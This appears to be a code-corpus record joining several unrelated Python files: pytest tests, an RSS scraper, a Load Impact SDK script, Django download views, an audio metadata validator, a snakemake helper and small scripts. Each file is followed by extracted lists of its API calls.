'tf.keras.layers.GlobalAveragePooling1D', ([], {}), '()\n', (2008, 2010), True, 'import tensorflow as tf\n'), ((2020, 2064), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(16)'], {'activation': '"""relu"""'}), "(16, activation='relu')\n", (2041, 2064), True, 'import tensorflow as tf\n'), ((2074, 2098), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)'], {}), '(1)\n', (2095, 2098), True, 'import tensorflow as tf\n'), ((2171, 2223), 'tensorflow.keras.losses.BinaryCrossentropy', 'tf.keras.losses.BinaryCrossentropy', ([], {'from_logits': '(True)'}), '(from_logits=True)\n', (2205, 2223), True, 'import tensorflow as tf\n'), ((3165, 3204), 'os.path.join', 'os.path.join', (['LOG_DIR', '"""embedding.ckpt"""'], {}), "(LOG_DIR, 'embedding.ckpt')\n", (3177, 3204), False, 'import os\n'), ((3276, 3313), 'os.path.join', 'os.path.join', (['log_dir', 'METADATA_FNAME'], {}), '(log_dir, METADATA_FNAME)\n', (3288, 3313), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright © 2021–2022 <NAME> <<EMAIL>>
# Released under the MIT Licence
#
import pytest
from pytcnz.gender import Gender, InvalidGenderError
@pytest.fixture(
params=[
"M",
"W",
"Man",
"Men",
"Women",
"Woman",
"male",
"female",
None,
"NONE",
"N",
"w",
"m",
"f",
]
)
def valid_gender(request):
return request.param
def test_valid_genders(valid_gender):
Gender.from_string(valid_gender)
@pytest.fixture(params=[1, "X", True, "bar"])
def invalid_gender(request):
return request.param
def test_invalid_genders(invalid_gender):
with pytest.raises(InvalidGenderError):
Gender.from_string(invalid_gender)
@pytest.fixture(
params=[(Gender.M, "Male"), (Gender.W, "Female"), (Gender.N, "None")]
)
def gender_sex_pair(request):
return request.param
def test_gender_to_sex_conversion(gender_sex_pair):
assert Gender.to_sex(gender_sex_pair[0]) == gender_sex_pair[1]
|
[
"pytest.raises",
"pytcnz.gender.Gender.to_sex",
"pytcnz.gender.Gender.from_string",
"pytest.fixture"
] |
[((174, 295), 'pytest.fixture', 'pytest.fixture', ([], {'params': "['M', 'W', 'Man', 'Men', 'Women', 'Woman', 'male', 'female', None, 'NONE',\n 'N', 'w', 'm', 'f']"}), "(params=['M', 'W', 'Man', 'Men', 'Women', 'Woman', 'male',\n 'female', None, 'NONE', 'N', 'w', 'm', 'f'])\n", (188, 295), False, 'import pytest\n'), ((549, 593), 'pytest.fixture', 'pytest.fixture', ([], {'params': "[1, 'X', True, 'bar']"}), "(params=[1, 'X', True, 'bar'])\n", (563, 593), False, 'import pytest\n'), ((782, 871), 'pytest.fixture', 'pytest.fixture', ([], {'params': "[(Gender.M, 'Male'), (Gender.W, 'Female'), (Gender.N, 'None')]"}), "(params=[(Gender.M, 'Male'), (Gender.W, 'Female'), (Gender.N,\n 'None')])\n", (796, 871), False, 'import pytest\n'), ((513, 545), 'pytcnz.gender.Gender.from_string', 'Gender.from_string', (['valid_gender'], {}), '(valid_gender)\n', (531, 545), False, 'from pytcnz.gender import Gender, InvalidGenderError\n'), ((701, 734), 'pytest.raises', 'pytest.raises', (['InvalidGenderError'], {}), '(InvalidGenderError)\n', (714, 734), False, 'import pytest\n'), ((744, 778), 'pytcnz.gender.Gender.from_string', 'Gender.from_string', (['invalid_gender'], {}), '(invalid_gender)\n', (762, 778), False, 'from pytcnz.gender import Gender, InvalidGenderError\n'), ((994, 1027), 'pytcnz.gender.Gender.to_sex', 'Gender.to_sex', (['gender_sex_pair[0]'], {}), '(gender_sex_pair[0])\n', (1007, 1027), False, 'from pytcnz.gender import Gender, InvalidGenderError\n')]
|
import scrappers
import re
import scrappers.mixins
class CBSNews(scrappers.mixins.RSSScrapper, scrappers.Scrapper):
"""The CBS News RSS feeds scrapper.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def should_translate(self):
return False
def encoding(self):
return 'UTF-8'
def skipping_rules(self, title):
"""
:param title: The scraped title
:return: True if we want to skip, otherwise False.
"""
skip_regexs = [re.compile(r'^Photos\s+of\s+the\s+week', re.IGNORECASE)]
return any([r.match(title) for r in skip_regexs])
def resource_urls(self):
return [{'category': 'Top Stories', 'url': 'http://www.cbsnews.com/latest/rss/main'},
{'category': 'US', 'url': 'http://www.cbsnews.com/latest/rss/us'},
{'category': 'Sci-Tech', 'url': 'http://www.cbsnews.com/latest/rss/tech'},
{'category': 'World', 'url': 'http://www.cbsnews.com/latest/rss/world'},
{'category': 'Politics', 'url': 'http://www.cbsnews.com/latest/rss/politics'}]
|
[
"re.compile"
] |
[((536, 593), 're.compile', 're.compile', (['"""^Photos\\\\s+of\\\\s+the\\\\s+week"""', 're.IGNORECASE'], {}), "('^Photos\\\\s+of\\\\s+the\\\\s+week', re.IGNORECASE)\n", (546, 593), False, 'import re\n')]
|
#!/usr/bin/python3
import time
import dh.data
import dh.image
import dh.network
import dh.utils
###
#%% main
###
def main():
C = dh.network.ImageProcessingClient2("localhost")
# input
I = dh.data.lena()
params = {"gamma": 0.5}
print("Input:")
dh.image.pinfo(I)
# result
t0 = time.time()
(J, info) = C.process(I, params)
t1 = time.time()
# show result
print("Output:")
dh.image.pinfo(J)
print("Info:")
print(info)
print("Received result after {} ms".format(dh.utils.around((t1 - t0) * 1000.0)))
dh.image.show(dh.image.stack([I, J]), wait=0, closeWindow=True)
if __name__ == "__main__":
main()
|
[
"time.time"
] |
[((315, 326), 'time.time', 'time.time', ([], {}), '()\n', (324, 326), False, 'import time\n'), ((373, 384), 'time.time', 'time.time', ([], {}), '()\n', (382, 384), False, 'import time\n')]
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright 2013 Load Impact
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import optparse
import sys
import traceback
from loadimpact import (
ApiTokenClient, ApiError, DataStore, LoadZone, TestConfig, UserScenario,
__version__ as li_sdk_version)
def get_or_list(client, cls, resource_id=None):
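    # fetch a single resource when an id is given, otherwise list all resources of that type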
if resource_id:
return [cls.get(client, resource_id)]
else:
return cls.list(client)
def inspect_resource(api_token, resource_name, resource_id=None, debug=False):
client = ApiTokenClient(api_token)
resources = []
if resource_name in ['ds', 'datastore', 'data-store', 'data_store']:
resources = get_or_list(client, DataStore, resource_id)
elif resource_name in ['lz', 'loadzone', 'load-zone', 'load_zone']:
resources = get_or_list(client, LoadZone, None)
elif resource_name in ['tc', 'testconfig', 'test-config', 'test_config']:
resources = get_or_list(client, TestConfig, resource_id)
elif resource_name in ['us', 'userscenario', 'user-scenario',
'user_scenario']:
resources = get_or_list(client, UserScenario, resource_id)
else:
raise RuntimeError("Unknown resource: %s" % resource_name)
for resource in resources:
print(repr(resource))
if __name__ == "__main__":
p = optparse.OptionParser(version=('%%prog %s' % li_sdk_version))
p.add_option('--api-token', action='store',
dest='api_token', default=None,
help=("Your Load Impact API token."))
p.add_option('--debug', action='store_true', dest='debug', default=False,
help=("."))
opts, args = p.parse_args()
if 1 > len(args):
print("You need to specify at least 1 argument (to list): "
"resource_name")
print("Specify 2 arguments (to get specific resource): resource_name, "
"resource_id")
sys.exit(2)
resource_name = args[0]
resource_id = None
if 1 < len(args):
resource_id = int(args[1])
try:
inspect_resource(opts.api_token, resource_name, resource_id=resource_id,
debug=opts.debug)
except ApiError:
print("Error encountered: %s" % traceback.format_exc())
|
[
"loadimpact.ApiTokenClient",
"sys.exit",
"traceback.format_exc",
"optparse.OptionParser"
] |
[((1033, 1058), 'loadimpact.ApiTokenClient', 'ApiTokenClient', (['api_token'], {}), '(api_token)\n', (1047, 1058), False, 'from loadimpact import ApiTokenClient, ApiError, DataStore, LoadZone, TestConfig, UserScenario, __version__ as li_sdk_version\n'), ((1841, 1900), 'optparse.OptionParser', 'optparse.OptionParser', ([], {'version': "('%%prog %s' % li_sdk_version)"}), "(version='%%prog %s' % li_sdk_version)\n", (1862, 1900), False, 'import optparse\n'), ((2433, 2444), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (2441, 2444), False, 'import sys\n'), ((2749, 2771), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (2769, 2771), False, 'import traceback\n')]
|
import glob
import json
import os
from wsgiref.util import FileWrapper
import shutil
import pandas as pd
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http.response import HttpResponse
from django.shortcuts import render
from interface.models import DbQuery
from interface.models import StarsFilter
@login_required(login_url='login/')
def all_filters(request):
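    # gather this user's star-filter jobs, newest first, and render them via the shared jobs template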
stars_filters_path = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters")
header = ["Job id", "Status", "Start date",
"Finish date", "Descriptors", "Deciders", "Link"]
dat = []
for star_filt in StarsFilter.objects.filter(user=request.user):
row = [star_filt.id,
star_filt.status,
str(star_filt.start_date),
str(star_filt.finish_date),
star_filt.descriptors.replace(";", "<br>"),
star_filt.deciders,
str(star_filt.id)]
dat.append(row)
table = pd.DataFrame(
dat, columns=["fold_name", "status", "start", "stop", "descr", "decid", "job_id"])
table["start"] = pd.to_datetime(table["start"])
table.sort_values(by="start", ascending=False, inplace=True)
job_ids = table["job_id"].values.tolist()
table = table.drop('job_id', 1)
return render(request, 'interface/jobs.html', {"page_title": "Star filter jobs",
"header": header,
"stars_filter": True,
"delete_prefix" : '"../{}/delete/"'.format(os.environ.get(
"DOCKYARD_APP_CONTEXT"), ""),
"table": zip(table.values.tolist(), job_ids)})
@login_required(login_url='login/')
def _all_filters(request):
stars_filters_path = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters")
header = ["Job id", "Status", "Date", "Descriptors", "Deciders", "Link"]
dat = []
for folder_name in os.listdir(stars_filters_path):
try:
with open(os.path.join(stars_filters_path, folder_name, "status.json"), 'r') as status_file:
status = json.load(status_file)
row = [folder_name,
status.get("status", ""),
status.get("start", ""),
status.get("descriptors", ""),
status.get("deciders", ""),
str(folder_name)]
dat.append(row)
except:
pass
table = pd.DataFrame(
dat, columns=["fold_name", "status", "start", "descr", "decid", "job_id"])
table["start"] = pd.to_datetime(table["start"])
table.sort_values(by="start", ascending=False, inplace=True)
job_ids = table["job_id"].values.tolist()
table = table.drop('job_id', 1)
return render(request, 'interface/jobs.html', {"page_title": "Star filter jobs",
"header": header,
"stars_filter": True,
"table": zip(table.values.tolist(), job_ids)})
@login_required(login_url='login/')
def all_results(request):
queries_path = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "query_results")
header = ["Job id", "Status", "Started",
"Finished", "Queries", "Connectors", "Link"]
dat = []
for query in DbQuery.objects.filter(user=request.user):
row = [query.id,
query.status,
str(query.start_date),
str(query.finish_date),
str(query.queries),
query.connectors,
str(query.id)]
dat.append(row)
table = pd.DataFrame(
dat, columns=["fold_name", "status", "started", "finished", "queries", "conn", "job_id"])
table["started"] = pd.to_datetime(table["started"])
table.sort_values(by="started", ascending=False, inplace=True)
job_ids = table["job_id"].values.tolist()
table = table.drop('job_id', 1)
return render(request, 'interface/jobs.html', {"page_title": "Queries jobs",
"stars_filter": False,
"header": header,
"delete_prefix": '"../{}/delete/"'.format(os.environ.get(
"DOCKYARD_APP_CONTEXT")),
"table": zip(table.values.tolist(), job_ids)})
def download_file(request, file_name):
"""
Send a file through Django without loading the whole file into
memory at once. The FileWrapper will turn the file object into an
iterator for chunks of 8KB.
"""
if file_name.startswith("estim"):
file_type = "estim"
file_name = file_name[9:]
filename = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters", file_name, "estimator")
elif not file_name.startswith("filt"):
file_type = "query"
filename = os.path.join(
settings.MEDIA_ROOT, str(request.user.id), "query_results", file_name + ".zip")
else:
file_type = "filter"
file_name = file_name[4:]
pa = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters", file_name)
filter_names = glob.glob(pa + "/*.filter")
if filter_names:
filter_name = os.path.basename(filter_names[0])
filename = os.path.join(
settings.MEDIA_ROOT, str(request.user.id), "stars_filters", file_name, filter_name)
else:
return render(request, 'interface/error_page.html', {"error_m": "There is no filter in %s" % file_name})
wrapper = FileWrapper(open(filename, 'rb'))
response = HttpResponse(wrapper, content_type='text/plain')
response['Content-Length'] = os.path.getsize(filename)
if file_type == "filter":
response[
'Content-Disposition'] = 'attachment; filename="%s.filter"' % filter_name
elif file_type == "estim":
response[
'Content-Disposition'] = 'attachment; filename="estimator"'
else:
response[
'Content-Disposition'] = 'attachment; filename="results_%s.zip"' % file_name
return response
|
[
"django.contrib.auth.decorators.login_required",
"pandas.DataFrame",
"json.load",
"os.path.basename",
"os.path.getsize",
"interface.models.StarsFilter.objects.filter",
"os.environ.get",
"pandas.to_datetime",
"glob.glob",
"django.shortcuts.render",
"interface.models.DbQuery.objects.filter",
"os.path.join",
"os.listdir",
"django.http.response.HttpResponse"
] |
[((361, 395), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""login/"""'}), "(login_url='login/')\n", (375, 395), False, 'from django.contrib.auth.decorators import login_required\n'), ((1854, 1888), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""login/"""'}), "(login_url='login/')\n", (1868, 1888), False, 'from django.contrib.auth.decorators import login_required\n'), ((3280, 3314), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""login/"""'}), "(login_url='login/')\n", (3294, 3314), False, 'from django.contrib.auth.decorators import login_required\n'), ((667, 712), 'interface.models.StarsFilter.objects.filter', 'StarsFilter.objects.filter', ([], {'user': 'request.user'}), '(user=request.user)\n', (693, 712), False, 'from interface.models import StarsFilter\n'), ((1026, 1125), 'pandas.DataFrame', 'pd.DataFrame', (['dat'], {'columns': "['fold_name', 'status', 'start', 'stop', 'descr', 'decid', 'job_id']"}), "(dat, columns=['fold_name', 'status', 'start', 'stop', 'descr',\n 'decid', 'job_id'])\n", (1038, 1125), True, 'import pandas as pd\n'), ((1152, 1182), 'pandas.to_datetime', 'pd.to_datetime', (["table['start']"], {}), "(table['start'])\n", (1166, 1182), True, 'import pandas as pd\n'), ((2128, 2158), 'os.listdir', 'os.listdir', (['stars_filters_path'], {}), '(stars_filters_path)\n', (2138, 2158), False, 'import os\n'), ((2655, 2746), 'pandas.DataFrame', 'pd.DataFrame', (['dat'], {'columns': "['fold_name', 'status', 'start', 'descr', 'decid', 'job_id']"}), "(dat, columns=['fold_name', 'status', 'start', 'descr', 'decid',\n 'job_id'])\n", (2667, 2746), True, 'import pandas as pd\n'), ((2773, 2803), 'pandas.to_datetime', 'pd.to_datetime', (["table['start']"], {}), "(table['start'])\n", (2787, 2803), True, 'import pandas as pd\n'), ((3568, 3609), 'interface.models.DbQuery.objects.filter', 'DbQuery.objects.filter', ([], {'user': 'request.user'}), '(user=request.user)\n', (3590, 3609), False, 'from interface.models import DbQuery\n'), ((3877, 3983), 'pandas.DataFrame', 'pd.DataFrame', (['dat'], {'columns': "['fold_name', 'status', 'started', 'finished', 'queries', 'conn', 'job_id']"}), "(dat, columns=['fold_name', 'status', 'started', 'finished',\n 'queries', 'conn', 'job_id'])\n", (3889, 3983), True, 'import pandas as pd\n'), ((4012, 4044), 'pandas.to_datetime', 'pd.to_datetime', (["table['started']"], {}), "(table['started'])\n", (4026, 4044), True, 'import pandas as pd\n'), ((6005, 6053), 'django.http.response.HttpResponse', 'HttpResponse', (['wrapper'], {'content_type': '"""text/plain"""'}), "(wrapper, content_type='text/plain')\n", (6017, 6053), False, 'from django.http.response import HttpResponse\n'), ((6087, 6112), 'os.path.getsize', 'os.path.getsize', (['filename'], {}), '(filename)\n', (6102, 6112), False, 'import os\n'), ((5559, 5586), 'glob.glob', 'glob.glob', (["(pa + '/*.filter')"], {}), "(pa + '/*.filter')\n", (5568, 5586), False, 'import glob\n'), ((1652, 1690), 'os.environ.get', 'os.environ.get', (['"""DOCKYARD_APP_CONTEXT"""'], {}), "('DOCKYARD_APP_CONTEXT')\n", (1666, 1690), False, 'import os\n'), ((2303, 2325), 'json.load', 'json.load', (['status_file'], {}), '(status_file)\n', (2312, 2325), False, 'import json\n'), ((4513, 4551), 'os.environ.get', 'os.environ.get', (['"""DOCKYARD_APP_CONTEXT"""'], {}), "('DOCKYARD_APP_CONTEXT')\n", (4527, 4551), False, 'import os\n'), ((5639, 5672), 'os.path.basename', 'os.path.basename', (['filter_names[0]'], {}), 
'(filter_names[0])\n', (5655, 5672), False, 'import os\n'), ((5843, 5945), 'django.shortcuts.render', 'render', (['request', '"""interface/error_page.html"""', "{'error_m': 'There is no filter in %s' % file_name}"], {}), "(request, 'interface/error_page.html', {'error_m': \n 'There is no filter in %s' % file_name})\n", (5849, 5945), False, 'from django.shortcuts import render\n'), ((2195, 2255), 'os.path.join', 'os.path.join', (['stars_filters_path', 'folder_name', '"""status.json"""'], {}), "(stars_filters_path, folder_name, 'status.json')\n", (2207, 2255), False, 'import os\n')]
|
from models.abstract_handler import BaseValidator
from configs.configs import dataset_type_asr, dataset_type_asr_unlabeled, dataset_type_tts, asr_minimum_words_per_min
import logging
from logging.config import dictConfig
log = logging.getLogger('file')
import audio_metadata
from word2number import w2n
from datetime import timedelta
import os
class AudioMetadataCheck(BaseValidator):
"""
Verifies the metadata for the audio file and
adds the durationInSeconds field. Also verifies
the correlation between the length of text and duration of audio clip
"""
def execute(self, request):
log.info('----Executing the audio file metadata check----')
try:
if request["datasetType"] in [dataset_type_asr, dataset_type_asr_unlabeled, dataset_type_tts]:
audio_file = request['record']['fileLocation']
try:
if os.path.exists(audio_file) and os.path.isfile(audio_file):
file_size = os.path.getsize(audio_file)
else:
log.info('The audio file does not exist in file store')
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
except Exception as e:
log.exception(f"Exception while accessing file from file store: {str(e)}")
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
if file_size == 0:
return {"message": "The audio file is unplayable, the filesize is 0 bytes", "code": "ZERO_BYTES_FILE", "status": "FAILED"}
try:
if os.path.exists(audio_file) and os.path.isfile(audio_file):
metadata = audio_metadata.load(audio_file)
else:
log.info('The audio file does not exist in file store')
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
except Exception as e:
log.exception(f"Exception while loading the audio file: {str(e)}")
return {"message": "Unable to load the audio file, file format is unsupported or the file is corrupt", "code": "INVALID_AUDIO_FILE", "status": "FAILED"}
if 'duration' in request['record'].keys():
request['record']['durationInSeconds'] = request['record']['duration']
elif 'startTime' in request['record'].keys() and 'endTime' in request['record'].keys():
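                    # no explicit duration given: derive it from the HH:MM:SS start/end timestamps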
h, m, s = request['record']['startTime'].split(':')
start_t = timedelta(hours=int(h), minutes=int(m), seconds=float(s))
h, m, s = request['record']['endTime'].split(':')
end_t = timedelta(hours=int(h), minutes=int(m), seconds=float(s))
request['record']['durationInSeconds'] = (end_t-start_t).total_seconds()
else:
request['record']['durationInSeconds'] = metadata.streaminfo.duration
if 'samplingRate' in request['record'].keys() and request['record']['samplingRate'] != None:
if metadata.streaminfo.sample_rate != request['record']['samplingRate']*1000:
error_message = 'Sampling rate does not match the specified value: Expected Value - ' + str(metadata.streaminfo.sample_rate/1000) + ', Specified Value - ' + str(request['record']['samplingRate'])
return {"message": error_message, "code": "INCORRECT_SAMPLING_RATE", "status": "FAILED"}
if 'bitsPerSample' in request['record'].keys() and request['record']['bitsPerSample'] != None:
if metadata.streaminfo.bit_depth != w2n.word_to_num(request['record']['bitsPerSample']):
error_message = 'Bits per sample does not match the specified value: Expected Value - ' + str(metadata.streaminfo.bit_depth) + ', Specified Value - ' + str(request['record']['bitsPerSample'])
return {"message": error_message, "code": "INCORRECT_BITS_PER_SAMPLE", "status": "FAILED"}
if request["datasetType"] in [dataset_type_asr, dataset_type_tts]:
num_words = len(list(request['record']['text'].split()))
words_per_minute = (num_words/request['record']['durationInSeconds'])*60
if words_per_minute < asr_minimum_words_per_min:
return {"message": "Number of words too less for the audio duration", "code": "AUDIO_TEXT_INVALID_CORRELATION", "status": "FAILED"}
log.info('----Audio metadata check -> Passed----')
return super().execute(request)
except Exception as e:
log.exception(f"Exception while executing Audio metadata check: {str(e)}")
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
# Log config
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'info': {
'class': 'logging.FileHandler',
'level': 'DEBUG',
'formatter': 'default',
'filename': 'info.log'
},
'console': {
'class': 'logging.StreamHandler',
'level': 'DEBUG',
'formatter': 'default',
'stream': 'ext://sys.stdout',
}
},
'loggers': {
'file': {
'level': 'DEBUG',
'handlers': ['info', 'console'],
'propagate': ''
}
},
'root': {
'level': 'DEBUG',
'handlers': ['info', 'console']
}
})
|
[
"os.path.getsize",
"os.path.exists",
"audio_metadata.load",
"os.path.isfile",
"logging.config.dictConfig",
"word2number.w2n.word_to_num",
"logging.getLogger"
] |
[((227, 252), 'logging.getLogger', 'logging.getLogger', (['"""file"""'], {}), "('file')\n", (244, 252), False, 'import logging\n'), ((5196, 5784), 'logging.config.dictConfig', 'dictConfig', (["{'version': 1, 'formatters': {'default': {'format':\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s'\n }}, 'handlers': {'info': {'class': 'logging.FileHandler', 'level':\n 'DEBUG', 'formatter': 'default', 'filename': 'info.log'}, 'console': {\n 'class': 'logging.StreamHandler', 'level': 'DEBUG', 'formatter':\n 'default', 'stream': 'ext://sys.stdout'}}, 'loggers': {'file': {'level':\n 'DEBUG', 'handlers': ['info', 'console'], 'propagate': ''}}, 'root': {\n 'level': 'DEBUG', 'handlers': ['info', 'console']}}"], {}), "({'version': 1, 'formatters': {'default': {'format':\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s'\n }}, 'handlers': {'info': {'class': 'logging.FileHandler', 'level':\n 'DEBUG', 'formatter': 'default', 'filename': 'info.log'}, 'console': {\n 'class': 'logging.StreamHandler', 'level': 'DEBUG', 'formatter':\n 'default', 'stream': 'ext://sys.stdout'}}, 'loggers': {'file': {'level':\n 'DEBUG', 'handlers': ['info', 'console'], 'propagate': ''}}, 'root': {\n 'level': 'DEBUG', 'handlers': ['info', 'console']}})\n", (5206, 5784), False, 'from logging.config import dictConfig\n'), ((904, 930), 'os.path.exists', 'os.path.exists', (['audio_file'], {}), '(audio_file)\n', (918, 930), False, 'import os\n'), ((935, 961), 'os.path.isfile', 'os.path.isfile', (['audio_file'], {}), '(audio_file)\n', (949, 961), False, 'import os\n'), ((999, 1026), 'os.path.getsize', 'os.path.getsize', (['audio_file'], {}), '(audio_file)\n', (1014, 1026), False, 'import os\n'), ((1783, 1809), 'os.path.exists', 'os.path.exists', (['audio_file'], {}), '(audio_file)\n', (1797, 1809), False, 'import os\n'), ((1814, 1840), 'os.path.isfile', 'os.path.isfile', (['audio_file'], {}), '(audio_file)\n', (1828, 1840), False, 'import os\n'), ((1877, 1908), 'audio_metadata.load', 'audio_metadata.load', (['audio_file'], {}), '(audio_file)\n', (1896, 1908), False, 'import audio_metadata\n'), ((3948, 3999), 'word2number.w2n.word_to_num', 'w2n.word_to_num', (["request['record']['bitsPerSample']"], {}), "(request['record']['bitsPerSample'])\n", (3963, 3999), False, 'from word2number import w2n\n')]
|
import os
import sys
import click
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask import redirect, url_for, abort, render_template, flash
from flask_wtf import FlaskForm
from wtforms import SubmitField, TextAreaField
from wtforms.validators import DataRequired
# SQLite URI compatible
WIN = sys.platform.startswith('win')
if WIN:
prefix = 'sqlite:///'
else:
prefix = 'sqlite:////'
app = Flask(__name__)
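# use DATABASE_URL when it is set, otherwise fall back to a SQLite file inside the app root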
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', prefix + os.path.join(app.root_path, 'data.db'))
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
@app.route('/')
def hello_world():
return 'Hello World!'
if __name__ == '__main__':
app.run()
|
[
"sys.platform.startswith",
"flask.Flask",
"os.path.join",
"flask_sqlalchemy.SQLAlchemy"
] |
[((320, 350), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win"""'], {}), "('win')\n", (343, 350), False, 'import sys\n'), ((425, 440), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (430, 440), False, 'from flask import Flask\n'), ((616, 631), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (626, 631), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((517, 555), 'os.path.join', 'os.path.join', (['app.root_path', '"""data.db"""'], {}), "(app.root_path, 'data.db')\n", (529, 555), False, 'import os\n')]
|
import pandas as pd
import logging
import os
import snakemake as snakemake_api
import tempfile
import yaml
from .constants import *
from .i_o import get_logger, get_df_drop_message
# Helper functions
def convert_with_map(row, index, convert_map):
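    # look up row[index] in convert_map, falling back to NAN_VAL when the value is unmapped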
try:
return convert_map[row[index]]
except KeyError:
return NAN_VAL
def clean_ssm_df(df):
"""Perform the final stage of standardization of a simple somatic mutation dataframe.
Parameters
----------
df : `pd.DataFrame`
A simple somatic mutation dataframe that contains all of the expected columns.
Returns
-------
`pd.DataFrame`
The dataframe with typed columns, sorted rows, and filtered rows (filtered if NaN/invalid chromosome, NaN start pos, or NaN end pos).
"""
# Drop mutations with NaN chromosome
filtered_df = df.dropna(subset=[COLNAME.CHR.value])
logging.debug(get_df_drop_message(COLNAME.CHR.value, "NaN value", df, filtered_df))
df = filtered_df
# Drop mutations with NaN start position
filtered_df = df.dropna(subset=[COLNAME.POS_START.value])
logging.debug(get_df_drop_message(COLNAME.POS_START.value, "NaN value", df, filtered_df))
df = filtered_df
# Drop mutations with NaN end position
filtered_df = df.dropna(subset=[COLNAME.POS_END.value])
logging.debug(get_df_drop_message(COLNAME.POS_END.value, "NaN value", df, filtered_df))
df = filtered_df
# Drop mutations with invalid chromosome
filtered_df = df.loc[df[COLNAME.CHR.value].isin(CHROMOSOMES)]
logging.debug(get_df_drop_message(COLNAME.CHR.value, "invalid value", df, filtered_df))
df = filtered_df
# Ensure correct types before sorting
df[COLNAME.CHR.value] = df[COLNAME.CHR.value].apply(str) # make sure everything is a string
df[COLNAME.POS_START.value] = df[COLNAME.POS_START.value].astype(int)
df[COLNAME.POS_END.value] = df[COLNAME.POS_END.value].astype(int)
# Sort the mutations by sample and then genomic location
df[COLNAME.CHR.value] = pd.Categorical(df[COLNAME.CHR.value], CHROMOSOMES, ordered=True)
df = df.sort_values([COLNAME.PATIENT.value, COLNAME.SAMPLE.value, COLNAME.CHR.value, COLNAME.POS_START.value])
# Restrict to the standard set of columns
return df[SSM_COLUMNS]
def run_snakemake_with_config(snakefile_path, config):
# Since snakemake() function can only handle "flat" dicts using the direct config= parameter,
# need to write the config dict to a temporary file and instead pass in to configfile=
try:
f = tempfile.NamedTemporaryFile(mode='w', delete=False)
yaml.dump(config, f, default_flow_style=False)
snakemake_api.snakemake(snakefile=snakefile_path, configfiles=[f.name])
f.close()
finally:
os.unlink(f.name)
|
[
"tempfile.NamedTemporaryFile",
"snakemake.snakemake",
"os.unlink",
"yaml.dump",
"pandas.Categorical"
] |
[((2036, 2100), 'pandas.Categorical', 'pd.Categorical', (['df[COLNAME.CHR.value]', 'CHROMOSOMES'], {'ordered': '(True)'}), '(df[COLNAME.CHR.value], CHROMOSOMES, ordered=True)\n', (2050, 2100), True, 'import pandas as pd\n'), ((2557, 2608), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'mode': '"""w"""', 'delete': '(False)'}), "(mode='w', delete=False)\n", (2584, 2608), False, 'import tempfile\n'), ((2617, 2663), 'yaml.dump', 'yaml.dump', (['config', 'f'], {'default_flow_style': '(False)'}), '(config, f, default_flow_style=False)\n', (2626, 2663), False, 'import yaml\n'), ((2672, 2743), 'snakemake.snakemake', 'snakemake_api.snakemake', ([], {'snakefile': 'snakefile_path', 'configfiles': '[f.name]'}), '(snakefile=snakefile_path, configfiles=[f.name])\n', (2695, 2743), True, 'import snakemake as snakemake_api\n'), ((2783, 2800), 'os.unlink', 'os.unlink', (['f.name'], {}), '(f.name)\n', (2792, 2800), False, 'import os\n')]
|
#!/bin/python3
# -*- coding: utf-8 -*-
import pandas
data = pandas.read_csv('./annser.csv',
header=0,
na_values=[''],
usecols=[0, 1, 3, 4])
abbrevs = ""
for index, rows in data.iterrows():
abbrev = "".join(
[s[:1] for s in (str(rows[1])).split(' ') if s[:1].isupper()]).lower()
if(str(rows[3]) == 'nan'):
rows[3] = "?" + abbrev
abbrevs += "".join([
"\\DefineJournal{",
abbrev,
"}{",
str(rows[3]),
"}\n{",
str(rows[0]),
"}\n{",
str(rows[1]),
"}\n"
])
file = open("annser-abbrev.tex", "w")
file.write(abbrevs)
file.close()
|
[
"pandas.read_csv"
] |
[((61, 140), 'pandas.read_csv', 'pandas.read_csv', (['"""./annser.csv"""'], {'header': '(0)', 'na_values': "['']", 'usecols': '[0, 1, 3, 4]'}), "('./annser.csv', header=0, na_values=[''], usecols=[0, 1, 3, 4])\n", (76, 140), False, 'import pandas\n')]
|
# -*- coding: utf-8 -*-
"""
2D sweep of drive power and frequency in Lockin mode.
"""
